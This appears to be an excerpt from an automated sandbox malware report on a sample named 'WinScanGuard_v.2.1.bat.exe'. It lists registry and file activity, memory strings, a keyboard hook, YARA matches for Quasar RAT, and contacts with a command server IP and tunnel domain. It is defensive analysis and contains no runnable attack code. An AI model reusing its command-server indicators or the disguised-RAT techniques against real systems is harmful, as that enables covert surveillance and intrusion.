              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
              Source: C:\Users\user\Desktop\WinScanGuard_v.2.1.bat.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
              Source: C:\Windows\$sxr-powershell.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
              Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user
              Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
              Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
              Source: C:\Windows\$sxr-mshta.exe | File opened: C:\Users\user\AppData
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDBBEDC FindFirstFileExW,13_2_000001A00BDBBEDC
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B62BEDC FindFirstFileExW,16_2_0000020D0B62BEDC
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF61550823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,16_2_00007FF61550823C
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615502978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,16_2_00007FF615502978
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00007FF6154F1560
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,16_2_00007FF6154F35B8
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615517B4C FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF615517B4C
              Source: C:\Windows\$sxr-powershell.exe | Code function: 21_2_00000242878BBEDC FindFirstFileExW,21_2_00000242878BBEDC
              Source: C:\Windows\System32\winlogon.exe | Code function: 24_2_00000225DC64BEDC FindFirstFileExW,24_2_00000225DC64BEDC
              Source: C:\Windows\System32\lsass.exe | Code function: 25_2_00000202C0AEBEDC FindFirstFileExW,25_2_00000202C0AEBEDC
              Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe | Code function: 26_2_04029AE0 FindFirstFileExW,26_2_04029AE0
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A66130BEDC FindFirstFileExW,27_2_000002A66130BEDC
              Source: C:\Windows\System32\svchost.exe | Code function: 27_2_000002A66136BEDC FindFirstFileExW,27_2_000002A66136BEDC
              Source: C:\Windows\System32\dwm.exe | Code function: 30_2_000002BAB14BBEDC FindFirstFileExW,30_2_000002BAB14BBEDC
              Source: C:\Windows\System32\svchost.exe | Code function: 31_2_0000026A87F4BEDC FindFirstFileExW,31_2_0000026A87F4BEDC
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_00000179537ABEDC FindFirstFileExW,36_2_00000179537ABEDC
              Source: C:\Windows\System32\svchost.exe | Code function: 36_2_0000017953D4BEDC FindFirstFileExW,36_2_0000017953D4BEDC
              Source: Joe Sandbox View | ASN Name: DIGITALOCEAN-ASNUS
              Source: Joe Sandbox View | IP Address: 167.71.56.116
              Source: global traffic | TCP traffic: 192.168.2.4:49736 -> 167.71.56.116:22112
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908552119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908552119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000003.2197674660.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046733621.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2909514725.00000202C0256000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908552119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
              Source: lsass.exe, 00000019.00000002.2908552119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: lsass.exe, 00000019.00000000.2046733621.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2909286057.00000202C0200000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
              Source: lsass.exe, 00000019.00000000.2046472218.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908118338.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908552119.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046537814.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000003.2197674660.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046733621.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2909514725.00000202C0256000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0H
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000003.2197674660.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046733621.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2909514725.00000202C0256000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1A91000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.00000285285E1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000015.00000002.2927032534.000002428799C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046472218.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2908118338.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
              Source: lsass.exe, 00000019.00000002.2907945762.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046445898.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
              Source: Amcache.hve.10.dr | String found in binary or memory: http://upx.sf.net
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0
              Source: lsass.exe, 00000019.00000000.2047005510.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911169498.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000000.2046960383.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000019.00000002.2911011421.00000202C0379000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com/CPS0~
              Source: $sxr-mshta.exe, 0000000D.00000002.2917110489.000001A00A80C000.00000004.00000020.00020000.00000000.sdmp, $sxr-mshta.exe, 0000000D.00000003.1934060188.000001A00A80F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/Vh5j3k
              Source: $sxr-mshta.exe, 0000000D.00000002.2917110489.000001A00A80C000.00000004.00000020.00020000.00000000.sdmp, $sxr-mshta.exe, 0000000D.00000003.1934060188.000001A00A80F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/odirm
              Source: $sxr-powershell.exe, 00000015.00000002.2927032534.000002428794F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2285788055.0000020CA1A91000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000012.00000002.2928056042.00000285285E1000.00000004.00000800.00020000.00000000.sdmp, $sxr-powershell.exe, 00000015.00000002.2927032534.0000024287975000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
              Source: WinScanGuard_v.2.1.bat.exe, 00000002.00000002.2138245203.0000020C81961000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/dahall/taskscheduler
              Source: $sxr-powershell.exe, 00000012.00000002.2928056042.0000028528E04000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/json
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: $sxr-powershell.exe, 00000012.00000002.3104746555.00000285389DE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknown | DNS traffic detected: queries for: throbbing-mountain-09011.pktriot.net
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              Source: C:\Windows\$sxr-powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\$sxr-powershell.exe

              E-Banking Fraud

              Source: Yara match | File source: Process Memory Space: $sxr-powershell.exe PID: 5088, type: MEMORYSTR

              System Summary

              Source: 18.2.$sxr-powershell.exe.285393991b8.13.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
              Source: 18.2.$sxr-powershell.exe.285393991b8.13.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
              Source: 18.2.$sxr-powershell.exe.28539411228.18.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
              Source: 18.2.$sxr-powershell.exe.285393c11f0.19.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
              Source: 18.2.$sxr-powershell.exe.28539411228.18.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
              Source: 18.2.$sxr-powershell.exe.285393c11f0.19.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
              Source: 00000012.00000002.3104746555.0000028539051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT Author: Florian Roth
              Source: WinScanGuard_v.2.1.bat | Static file information: 13030371
              Source: C:\Windows\$sxr-powershell.exe | Network Connect: 167.71.56.116 22112
              Source: C:\Windows\$sxr-cmd.exe | Process created: Commandline size = 7207
              Source: C:\Windows\$sxr-powershell.exe | Process created: Commandline size = 7313
              Source: C:\Windows\$sxr-cmd.exe | Process created: Commandline size = 7207
              Source: C:\Windows\$sxr-powershell.exe | Process created: Commandline size = 7313
              Source: C:\Windows\SysWOW64\dllhost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 144
              Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140001368
              Source: C:\Windows\System32\dllhost.exe | Code function: 6_2_0000000140001014
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00AAD2178
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00AADB0D0
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00AADF398
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00AADB2DC
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00AAE16F8
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDB2D78
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDBBCD0
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDBFF98
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDC22F8
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_000001A00BDBBEDC
              Source: C:\Windows\$sxr-mshta.exe | Code function: 13_2_00007FF7142F1008
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B5FF398
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B5FB2DC
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B6016F8
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B5F2178
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B5FB0D0
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B62FF98
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B62BEDC
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B6322F8
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B622D78
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_0000020D0B62BCD0
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154FAA54
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615500A6C
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615505554
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615504224
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6155037D8
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154FE680
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF61551EE88
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F7650
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154FD250
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F9E50
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F5240
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F372C
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615517F00
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F6EE4
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615521538
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154FCE10
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF61551AA30
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F8DF8
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F4A30
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F2220
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F81D4
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF61551D9D0
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F1884
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF615507854
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F2C48
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF61551AC4C
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F8510
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F7D30
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6155018D4
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154FB0D8
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F3F90
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F9B50
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F5B70
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF6154F3410
              Source: C:\Windows\$sxr-cmd.exe | Code function: 16_2_00007FF61551AFBC
